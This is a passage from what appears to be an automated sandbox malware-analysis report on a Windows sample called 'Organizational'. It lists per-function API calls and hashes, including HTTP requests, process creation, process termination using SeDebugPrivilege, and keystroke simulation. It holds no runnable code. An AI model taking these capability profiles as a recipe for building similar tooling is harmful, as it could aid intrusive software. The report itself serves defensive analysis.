                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 1924731296-2107944366
                                                    • Opcode ID: 06e1e3fa06d38e0fb72a7dac5e853700092b89a7097de1f967d4619e463f341a
                                                    • Instruction ID: 4b0ce9afc5e6bf102332203113b3ca7fc98164ab8441fbbdc97ddcf55d72225f
                                                    • Opcode Fuzzy Hash: 06e1e3fa06d38e0fb72a7dac5e853700092b89a7097de1f967d4619e463f341a
                                                    • Instruction Fuzzy Hash: 66517B71604308AFD704EF14CC9AFAA7BE5AB84310F10851EF559972E1DB70E945EF92
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F6211C
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F62148
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F6218A
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F6219F
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F621AC
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F621DC
                                                    • InternetCloseHandle.WININET(00000000), ref: 00F62223
                                                      • Part of subcall function 00F62B4F: GetLastError.KERNEL32(?,?,00F61EE3,00000000,00000000,00000001), ref: 00F62B64
                                                      • Part of subcall function 00F62B4F: SetEvent.KERNEL32(?,?,00F61EE3,00000000,00000000,00000001), ref: 00F62B79
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 2603140658-3916222277
                                                    • Opcode ID: 62be6e344c55d098bf8f20e7c7b4b48ba6a733de97f54024b6fbbeb8d7e6af59
                                                    • Instruction ID: f012df2dc5e3eadf579401f55ebe1e8a00b94d00be49dc7a0bc09e3c7304ccc2
                                                    • Opcode Fuzzy Hash: 62be6e344c55d098bf8f20e7c7b4b48ba6a733de97f54024b6fbbeb8d7e6af59
                                                    • Instruction Fuzzy Hash: B2416AB1901609BEEB529F50CC89FFF7BACEF08350F004116FA059A181DB749E44ABA0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F80980), ref: 00F69412
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F80980), ref: 00F69446
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F695C0
                                                    • SysFreeString.OLEAUT32(?), ref: 00F695EA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: 9c299d3bd67b36248c9be4e371f2bf58b0e6663e19186d8ea30ae17ca659248e
                                                    • Instruction ID: 760670f79a0bd7c74e4279e3445ffa6fcbe82e014d99fcb8eeb813d4441b4a5e
                                                    • Opcode Fuzzy Hash: 9c299d3bd67b36248c9be4e371f2bf58b0e6663e19186d8ea30ae17ca659248e
                                                    • Instruction Fuzzy Hash: 94F13A71A04209EFCF14DFA4C884EAEB7B9FF49314F148058F906AB251DB71AE46DB90
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F6FD9E
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FF31
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FF55
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FF95
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F6FFB7
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F70133
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F70165
                                                    • CloseHandle.KERNEL32(?), ref: 00F70194
                                                    • CloseHandle.KERNEL32(?), ref: 00F7020B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: f0fef1fb0376ffde9a6e0e748523908d8a7557827a3f2482a1d3f70e54071b5e
                                                    • Instruction ID: 92f5ecca6324360cb555bcb350c835e54728daaf4142e93a92a546e540dd244d
                                                    • Opcode Fuzzy Hash: f0fef1fb0376ffde9a6e0e748523908d8a7557827a3f2482a1d3f70e54071b5e
                                                    • Instruction Fuzzy Hash: ABE1BD31604301DFC714EF24D891B6ABBE1EF85320F14896DF9999B2A2DB31EC45EB52
                                                    APIs
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F53B8A,?), ref: 00F54BE0
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F53B8A,?), ref: 00F54BF9
                                                      • Part of subcall function 00F54FEC: GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F552FB
                                                    • _wcscmp.LIBCMT ref: 00F55315
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F55330
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: fcad3c99238d5be41d2e321b32f393cf5aaa26df05ae2dcdd6b99b99af19f350
                                                    • Instruction ID: d6d01ca743d200937a4ddc0a3020a979f6858526cb4ae2ffa4ab0485beff3cf4
                                                    • Opcode Fuzzy Hash: fcad3c99238d5be41d2e321b32f393cf5aaa26df05ae2dcdd6b99b99af19f350
                                                    • Instruction Fuzzy Hash: 095183B24087859BC764DBA0DC919DFB3ECAF84711F40491EB689C3052EF38A68C9766
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F78D24
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: d4ab69e5ea063ccea58143f87edd6f0ff2c5abe52b202f069c47390e5bbed5b5
                                                    • Instruction ID: 60e0665d1e4caf3023eb319564925564fe219ac0d17a0cf248444b2ec6d77c0b
                                                    • Opcode Fuzzy Hash: d4ab69e5ea063ccea58143f87edd6f0ff2c5abe52b202f069c47390e5bbed5b5
                                                    • Instruction Fuzzy Hash: B951A530A80208BFDB719B54CC8DBA97B65AB053A0F248517F618E61E1CF719951FB52
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F2C638
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F2C65A
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F2C672
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F2C690
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F2C6B1
                                                    • DestroyIcon.USER32(00000000), ref: 00F2C6C0
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F2C6DD
                                                    • DestroyIcon.USER32(?), ref: 00F2C6EC
                                                      • Part of subcall function 00F7AAD4: DeleteObject.GDI32(00000000), ref: 00F7AB0D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: 149a7ec160c149548cd38547d49b99a58c28d5076fe5c778d1845b169721edb6
                                                    • Instruction ID: 462d78b7156fc6cf10f32a42d1340a2c5bdd2a73d1614a71567773291d7fc508
                                                    • Opcode Fuzzy Hash: 149a7ec160c149548cd38547d49b99a58c28d5076fe5c778d1845b169721edb6
                                                    • Instruction Fuzzy Hash: BF514A71A10209AFDB20DF24DC45BBA7BB5EB48720F10451CFA46A7290DB71ED90EF90
                                                    APIs
                                                      • Part of subcall function 00F4B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4B54D
                                                      • Part of subcall function 00F4B52D: GetCurrentThreadId.KERNEL32 ref: 00F4B554
                                                      • Part of subcall function 00F4B52D: AttachThreadInput.USER32(00000000,?,00F4A23B,?,00000001), ref: 00F4B55B
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A246
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F4A263
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F4A266
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A26F
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F4A28D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F4A290
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4A299
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F4A2B0
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F4A2B3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 86bfdead0dfeb3a365d7212a425d7ed2d7ef794085694a2a61c312b37316bdf4
                                                    • Instruction ID: 76a4bf6fd3032195bea1b1e3cc563efe3a66aeaabe7aa3d087831769802162d9
                                                    • Opcode Fuzzy Hash: 86bfdead0dfeb3a365d7212a425d7ed2d7ef794085694a2a61c312b37316bdf4
                                                    • Instruction Fuzzy Hash: E511CEB1950618BEF6106B609C8EFBA7E2DEB4C760F900419F6406B0D1CEF25D50ABA0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F4915A,00000B00,?,?), ref: 00F494E2
                                                    • HeapAlloc.KERNEL32(00000000,?,00F4915A,00000B00,?,?), ref: 00F494E9
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F4915A,00000B00,?,?), ref: 00F494FE
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F4915A,00000B00,?,?), ref: 00F49506
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F4915A,00000B00,?,?), ref: 00F49509
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F4915A,00000B00,?,?), ref: 00F49519
                                                    • GetCurrentProcess.KERNEL32(00F4915A,00000000,?,00F4915A,00000B00,?,?), ref: 00F49521
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F4915A,00000B00,?,?), ref: 00F49524
                                                    • CreateThread.KERNEL32(00000000,00000000,00F4954A,00000000,00000000,00000000), ref: 00F4953E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 2c18018dcd26ce35a9f0bbe454746ebb8c032b70dc11b5d88c38f5838c67f9c7
                                                    • Instruction ID: 39f53ae4a8be3efafa219cd55fa2583fd1c83a188086211c389188a1acef7e5a
                                                    • Opcode Fuzzy Hash: 2c18018dcd26ce35a9f0bbe454746ebb8c032b70dc11b5d88c38f5838c67f9c7
                                                    • Instruction Fuzzy Hash: 3A01CDB6240708BFE750AFA5DC8DFAB7BACEB89711F504411FA05DB1A1DA709804DB20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: f436fe26217f7526830e5772419d7ce6d627d27a7118f38aa136390997e4148d
                                                    • Instruction ID: 3e92958e01502eef30e39e386d15de49760e70a55cd455b6c821f152b245ed4b
                                                    • Opcode Fuzzy Hash: f436fe26217f7526830e5772419d7ce6d627d27a7118f38aa136390997e4148d
                                                    • Instruction Fuzzy Hash: ADC18E71E0021A9BDF10DFA8C885AAEB7B5FF48310F148469E906BB280E771DD45EF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-625585964
                                                    • Opcode ID: d887c3eebf51251f063f33dfe20318c70458745b4404a88c703d7e211a3d8987
                                                    • Instruction ID: c128d5ee3659cdaf65cb04ae5f2e643bb3292596a1e1bea19a4ab01a2efc4036
                                                    • Opcode Fuzzy Hash: d887c3eebf51251f063f33dfe20318c70458745b4404a88c703d7e211a3d8987
                                                    • Instruction Fuzzy Hash: 6591AC71E04219ABCF24CFA5C884FAEBBB8EF85720F10855DF515AB281D7B49944DBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F77449
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F7745D
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F77477
                                                    • _wcscat.LIBCMT ref: 00F774D2
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F774E9
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F77517
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: d6ecf10e3439bef8ac015bad08c4c6612a3c7153eaec37974cae9d0335964264
                                                    • Instruction ID: b907debf66c10ea2d7fae9322c33e42778657dbda2c13f7298010a3ff68455f2
                                                    • Opcode Fuzzy Hash: d6ecf10e3439bef8ac015bad08c4c6612a3c7153eaec37974cae9d0335964264
                                                    • Instruction Fuzzy Hash: 0E41A471A14348AFDB21EF64CC85FEE77A8EF08360F10446AF948A7191D7719D84EB51
                                                    APIs
                                                      • Part of subcall function 00F54148: CreateToolhelp32Snapshot.KERNEL32 ref: 00F5416D
                                                      • Part of subcall function 00F54148: Process32FirstW.KERNEL32(00000000,?), ref: 00F5417B
                                                      • Part of subcall function 00F54148: CloseHandle.KERNEL32(00000000), ref: 00F54245
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F6F08D
                                                    • GetLastError.KERNEL32 ref: 00F6F0A0
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F6F0CF
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F6F14C
                                                    • GetLastError.KERNEL32(00000000), ref: 00F6F157
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F6F18C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 5743f38d2cdebd8277c75db6a2ad65f5555ce7b50b73b4e447838bbc64118fb5
                                                    • Instruction ID: d9cb47025f5498c8518e1ee91106dbe71fb03076afcae3d7339269faae349aac
                                                    • Opcode Fuzzy Hash: 5743f38d2cdebd8277c75db6a2ad65f5555ce7b50b73b4e447838bbc64118fb5
                                                    • Instruction Fuzzy Hash: 5541D0712003019FD725EF24DCA5F7EB7A5AF84724F048419FA069F2D2CB79A808EB95
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F5357C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 06acea9bb2ec7012a7d36f5c5e29cc2c6e22c82a6ab2b31ae6c32ae78f0a7dc8
                                                    • Instruction ID: 0d8de0e1ce24be9261d72f4fab5208ebba1139a052b67a1eacbf391e457fab8a
                                                    • Opcode Fuzzy Hash: 06acea9bb2ec7012a7d36f5c5e29cc2c6e22c82a6ab2b31ae6c32ae78f0a7dc8
                                                    • Instruction Fuzzy Hash: AB11EB72A48347BEA7005A58DC92DAA779CDF063F1F64101EFF0066182F764AF4476A1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F54802
                                                    • LoadStringW.USER32(00000000), ref: 00F54809
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F5481F
                                                    • LoadStringW.USER32(00000000), ref: 00F54826
                                                    • _wprintf.LIBCMT ref: 00F5484C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F5486A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F54847
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: d84387334fed9fa10c8fe39571cc82701e6af152e4f8a87a161dc21131c51aca
                                                    • Instruction ID: 27842b454a3d99582f058fa80dac859d8c72c363ad93a4012a0f9e877f31c16c
                                                    • Opcode Fuzzy Hash: d84387334fed9fa10c8fe39571cc82701e6af152e4f8a87a161dc21131c51aca
                                                    • Instruction Fuzzy Hash: E90162F294030C7FE791A7A09D89EF6736CEB08301F800595BB49E2041EA74AE889B75
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00F7DB42
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00F7DB62
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F7DD9D
